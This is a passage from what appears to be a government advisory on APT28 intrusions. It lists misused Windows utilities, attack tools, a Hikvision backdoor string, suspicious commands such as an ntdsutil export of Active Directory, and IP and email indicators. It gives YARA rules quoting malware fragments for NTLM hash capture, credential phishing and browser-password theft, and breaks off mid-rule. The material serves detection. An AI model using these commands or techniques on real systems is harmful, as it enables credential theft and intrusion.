<h3>Utilities and scripts</h3>
<p><strong>Legitimate utilities</strong></p>
<p>Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise:</p>
<ul>
<li>ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory</li>
<li>wevtutil – A legitimate Windows executable used by threat actors to delete event logs</li>
<li>vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive</li>
<li>ADexplorer – A legitimate window executable to view, edit, and backup Active Directory Certificate Services</li>
<li>OpenSSH – The Windows version of a legitimate open source SSH client</li>
<li>schtasks – A legitimate Windows executable used to create persistence using scheduled tasks</li>
<li>whoami – A legitimate Windows executable used to retrieve the name of the current user</li>
<li>tasklist – A legitimate Windows executable used to retrieve the list of running processes</li>
<li>hostname – A legitimate Windows executable used to retrieve the device name</li>
<li>arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment</li>
<li>systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information</li>
<li>net – A legitimate Windows executable used to retrieve detailed user information</li>
<li>wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives</li>
<li>cacls – A legitimate Windows executable used to modify permissions on files</li>
<li>icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership</li>
<li>ssh – A legitimate Windows executable used to establish network shell connections</li>
<li>reg – A legitimate Windows executable used to add to or modify the system registry&nbsp;</li>
</ul>
<p>Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. See the joint guide, <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a>, for guidance on developing a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.</p>
<p><strong>Malicious scripts</strong></p>
<ul>
<li>Certipy – An open source python tool for enumerating and abusing Active Directory Certificate Services</li>
<li>Get-GPPPassword.py – An open source python script for finding insecure passwords stored in Group Policy Preferences</li>
<li>ldap-dump.py – A script for enumerating user accounts and other information in Active Directory</li>
<li>Hikvision backdoor string: “YWRtaW46MTEK”</li>
</ul>
<p><strong>Suspicious command lines</strong></p>
<p>While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise:</p>
<ul>
<li>edge.exe “-headless-new -disable-gpu”</li>
<li>ntdsutil.exe &#8220;activate instance ntds&#8221; ifm &#8220;create full C:temp[a-z]{3}&#8221; quit quit</li>
<li>ssh -Nf</li>
<li>schtasks /create /xml</li>
</ul>
<h3>Outlook CVE Exploitation IOCs</h3>
<ul>
<li>md-shoeb@alfathdoor[.]com[.]sa</li>
<li>jayam@wizzsolutions[.]com</li>
<li>accounts@regencyservice[.]in</li>
<li>m.salim@tsc-me[.]com</li>
<li>vikram.anand@4ginfosource[.]com</li>
<li>mdelafuente@ukwwfze[.]com</li>
<li>sarah@cosmicgold469[.]co[.]za</li>
<li>franch1.lanka@bplanka[.]com</li>
<li>commerical@vanadrink[.]com</li>
<li>maint@goldenloaduae[.]com</li>
<li>karina@bhpcapital[.]com</li>
<li>tv@coastalareabank[.]com</li>
<li>ashoke.kumar@hbclife[.]in</li>
<li>213[.]32[.]252[.]221</li>
<li>124[.]168[.]91[.]178</li>
<li>194[.]126[.]178[.]8</li>
<li>159[.]196[.]128[.]120</li>
</ul>
<h3>Commonly Used Webmail Providers</h3>
<ul>
<li>portugalmail[.]pt</li>
<li>mail-online[.]dk</li>
<li>email[.]cz</li>
<li>seznam[.]cz</li>
</ul>
<h3>Malicious Archive Filenames Involving CVE-2023-38831</h3>
<ul>
<li>calc.war.zip</li>
<li>news_week_6.zip</li>
<li>Roadmap.zip</li>
<li>SEDE-PV-2023-10-09-1_EN.zip</li>
<li>war.zip</li>
<li>Zeyilname.zip</li>
</ul>
<h3>Brute Forcing IP Addresses</h3>
<p>Disclaimer: These IP addresses date June 2024 through August 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.</p>
<table class="tablesaw tablesaw-stack">
<thead>
<tr>
<th role="columnheader"><strong>June 2024</strong></th>
<th role="columnheader"><strong>July 2024</strong></th>
<th colspan="3" role="columnheader"><strong>August 2024</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>192[.]162[.]174[.]94</td>
<td>207[.]244[.]71[.]84</td>
<td>31[.]135[.]199[.]145</td>
<td>79[.]184[.]25[.]198</td>
<td>91[.]149[.]253[.]204 &nbsp;</td>
</tr>
<tr>
<td>103[.]97[.]203[.]29</td>
<td>162[.]210[.]194[.]2</td>
<td>31[.]42[.]4[.]138</td>
<td>79[.]185[.]5[.]142</td>
<td>91[.]149[.]254[.]75 &nbsp;</td>
</tr>
<tr>
<td>209[.]14[.]71[.]127</td>
<td>&nbsp;</td>
<td>46[.]112[.]70[.]252</td>
<td>83[.]10[.]46[.]174</td>
<td>91[.]149[.]255[.]122 &nbsp;</td>
</tr>
<tr>
<td>109[.]95[.]151[.]207</td>
<td>&nbsp;</td>
<td>46[.]248[.]185[.]236</td>
<td>83[.]168[.]66[.]145</td>
<td>91[.]149[.]255[.]19 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>64[.]176[.]67[.]117</td>
<td>83[.]168[.]78[.]27</td>
<td>91[.]149[.]255[.]195 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>64[.]176[.]69[.]196</td>
<td>83[.]168[.]78[.]31 &nbsp;</td>
<td>91[.]221[.]88[.]76 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>64[.]176[.]70[.]18</td>
<td>83[.]168[.]78[.]55 &nbsp;</td>
<td>93[.]105[.]185[.]139 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>64[.]176[.]70[.]238</td>
<td>83[.]23[.]130[.]49 &nbsp;</td>
<td>95[.]215[.]76[.]209 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>64[.]176[.]71[.]201</td>
<td>83[.]29[.]138[.]115 &nbsp;</td>
<td>138[.]199[.]59[.]43 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]242[.]220</td>
<td>89[.]64[.]70[.]69 &nbsp;</td>
<td>147[.]135[.]209[.]245 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]243[.]226</td>
<td>90[.]156[.]4[.]204 &nbsp;</td>
<td>178[.]235[.]191[.]182 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]244[.]100</td>
<td>91[.]149[.]202[.]215 &nbsp;</td>
<td>178[.]37[.]97[.]243 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]245[.]215</td>
<td>91[.]149[.]203[.]73 &nbsp;</td>
<td>185[.]234[.]235[.]69 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]252[.]168</td>
<td>91[.]149[.]219[.]158</td>
<td>192[.]162[.]174[.]67 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]252[.]186</td>
<td>91[.]149[.]219[.]23 &nbsp;</td>
<td>194[.]187[.]180[.]20 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]252[.]222</td>
<td>91[.]149[.]223[.]130 &nbsp;</td>
<td>212[.]127[.]78[.]170 &nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]253[.]13</td>
<td>91[.]149[.]253[.]118</td>
<td>213[.]134[.]184[.]167</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]253[.]247 &nbsp;</td>
<td>91[.]149[.]253[.]198 &nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>70[.]34[.]254[.]245</td>
<td>91[.]149[.]253[.]20 &nbsp;</td>
<td>&nbsp;</td>
</tr>
</tbody>
</table>
<h2><strong>Detections</strong></h2>
<h3>Customized NTLM listener</h3>
<div>
<div>
<p><code>rule APT28_NTLM_LISTENER {</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects NTLM listeners including APT28's custom one"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_1 = "start-process powershell.exe -WindowStyle hidden"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_2 = "New-Object System.Net.HttpListener"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_3 = "Prefixes.Add('http://localhost:8080/')"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_4 = "-match 'Authorization'"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_5 = "GetValues('Authorization')"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_6 = "Request.RemoteEndPoint.Address.IPAddressToString"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_8 = ".AllKeys"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_1 = "$NTLMAuthentication" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_2 = "$NTLMType2" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_3 = "$listener" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_4 = "$hostip" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_5 = "$request" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_6 = "$ntlmt2" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_7 = "$NTLMType2Response" nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $variable_8 = "$buffer" nocase</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 5 of ($command_*)&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; all of ($variable_*)</code></p>
</div>
<p><code>}</code></p>
</div>
<h3>HEADLACE shortcut</h3>
<p><code>rule APT28_HEADLACE_SHORTCUT {</code></p>
<div>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects the HEADLACE backdoor shortcut dropper. Rule is meant for threat hunting."</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $type = "[InternetShortcut]" ascii nocase</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $url&nbsp; = "file://"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $edge = "msedge.exe"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $icon = "IconFile"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; all of them</code></p>
<p><code>}</code></p>
</div>
<h3>HEADLACE credential dialogbox phishing&nbsp;</h3>
<div>
<div>
<p><code>rule APT28_HEADLACE_CREDENTIALDIALOG {</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects scripts used by APT28 to lure user into entering credentials"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_1 = "while($true)"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_2 = "Get-Credential $(whoami)"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_3 = "Add-Content"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_4 = ".UserName"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_5 = ".GetNetworkCredential().Password"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_6 = "GetNetworkCredential().Password.Length -ne 0"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 5 of them</code></p>
<p><code>}</code></p>
</div>
<h3>HEADLACE core script</h3>
<div>
<div>
<p><code>rule APT28_HEADLACE_CORE {</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects HEADLACE core batch scripts"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $chcp = "chcp 65001" ascii</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $headless = "start "" msedge --headless=new --disable-gpu" ascii</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_1 = "taskkill /im msedge.exe /f" ascii</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_2 = "whoami&gt;"%programdata%" ascii</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_3 = "timeout" ascii</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $command_4 = "copy "%programdata%" ascii</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $non_generic_del_1 = "del /q /f "%programdata%" ascii</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $non_generic_del_3 = "del /q /f "%userprofile%Downloads" ascii</code></p>
<p><code>&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $generic_del = "del /q /f" ascii</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $chcp&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $headless</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 of ($non_generic_del_*)</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ($generic_del)</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3 of ($command_*)</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )</code></p>
<p><code>}</code></p>
</div>
</div>
<h3>MASEPIE</h3>
<div>
<div>
<p><code>rule APT28_MASEPIE {</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects MASEPIE python script"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_1 = "os.popen('whoami').read()"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_2 = "elif message == 'check'"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_3 = "elif message == 'send_file':"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_4 = "elif message == 'get_file'"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_5 = "enc_mes('ok'"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_6 = "Bad command!'.encode('ascii'"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_7 = "{user}{SEPARATOR}{k}"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $masepie_unique_8 = "raise Exception("Reconnect"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3 of ($masepie_unique_*)</code></p>
<p><code>}</code></p>
</div>
</div>
<h3>STEELHOOK</h3>
<div>
<div>
<p><code>rule APT28_STEELHOOK {</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects APT28's STEELHOOK powershell script"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_1 = "$($env:LOCALAPPDATA\Google\Chrome\User Data\Local State)"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_2 = "$($env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data)"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_3 = "$($env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State)"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_4 = "$($env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data)"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_5 = "os_crypt.encrypted_key"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_6 = "System.Security.Cryptography.DataProtectionScope"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_7 = "[system.security.cryptography.protectdata]::Unprotect"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s_8 = "Invoke-RestMethod"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; all of them</code></p>
<p><code>}</code></p>
</div>
</div>
<h3>PSEXEC</h3>
<div>
<p><code>rule GENERIC_PSEXEC {</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; meta:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Detects SysInternals PSEXEC executable"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strings:</code></p>
